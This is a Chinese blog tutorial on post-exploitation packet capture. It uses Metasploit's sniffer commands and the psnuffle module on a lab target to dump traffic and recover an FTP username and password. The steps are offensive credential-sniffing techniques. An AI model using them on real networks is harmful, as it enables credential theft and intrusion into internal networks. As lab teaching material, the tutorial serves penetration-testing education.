后渗透-数据包捕获

为什么要进行数据包的捕获:当我们获得一个机器的权限后,可以通过对数据包的分析,判读内网中的服务,并且可以截获一些密码和重要数据,如:mail、http、svn、ftp等,为内网渗透打开大门。

利用msf下sniffer模块进行数据包捕获
msf获得session后使用命令load sniffer加载sniffer模块
接着可以使用命令sniffer_interfaces可以列举出网卡信息

可以看到有两个网卡的信息

使用命令sniffer_start 2开始捕获网卡id 2的数据包

命令sniffer_stats 2查看网卡id 2的捕获状态

在靶机中登录到其他主机的ftp服务中
命令sniffer_dump 2 test.cap将网卡id 2中捕获的信息导出到家目录的test.cap中,然后用wireshark打开


看到靶机登录了ip为192.168.83.91的ftp服务器中,并且账号为test,密码为123456

命令sniffer_stop 2停止捕获,sniffer_release 2将内存释放

使用psnuffle进行数据包分析
use auxiliary/sniffer/psnuffle使用该模块
set pcapfile /root/test.cap设置需要分析的数据包的路径
运行,结果:

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 学习中一小英_阅读 241评论 0 0
  • 今天突破了自己,觉得好满足啊!对于我这种平时连步都不想跑的人来说,最近已经跑了两次了,而且呢一次比一次进步,觉得自...
    悦己a丹丹阅读 396评论 3 1
  • 关于爱情 你说 真想哭一场 为那没盛开就枯萎的爱情 为那再也回不去的曾经 泪滴似珍珠滑落 我说 别哭 缘份...
    栗宁言阅读 164评论 0 1
  • 下午我去了天鹅湖,舅舅在那里上班,我们到那里后在办公室里呆了一会儿,我帮他对了一些答案,看到那些题目时我突然发现上...
    2006何婷阅读 189评论 1 0